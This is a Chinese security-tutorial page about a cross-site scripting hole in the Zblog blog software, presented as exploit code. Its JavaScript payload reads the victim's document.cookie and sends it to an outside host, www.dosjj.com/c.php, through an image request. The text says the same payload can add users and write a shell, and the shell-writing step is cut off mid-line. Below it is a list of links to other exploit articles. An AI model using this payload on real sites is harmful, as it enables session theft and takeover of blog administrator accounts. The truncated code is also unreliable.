手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >Zblog最新跨站漏洞及利用代码
Zblog最新跨站漏洞及利用代码
摘要:Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向xmlhttp=poster();cookie=document.co...

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

xmlhttp=poster();

cookie=document.cookie;

login=cookie.indexOf(‘password’)==-1?0:1;

tolocation=’/’;

//get cookie

x=new Image();

x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

//get a shell

data=”txaContent=

【Zblog最新跨站漏洞及利用代码】相关文章:

boblog任意变量覆盖漏洞

ewebeditor通杀鸡肋0day漏洞

入侵检测系统漏洞的分析

Mambo index.php文件多个跨站脚本执行漏洞

phpinfo跨站脚本漏洞

discuz获取任意管理员密码漏洞利用工具vbs版

SiteServer CMS 系统0Day/漏洞利用

URL解析漏洞在PDF文档中的利用

DedeCmsV5.6 本地包含又一利用方式

IBM Rational ClearQuest 跨站脚本漏洞

精品推荐
分类导航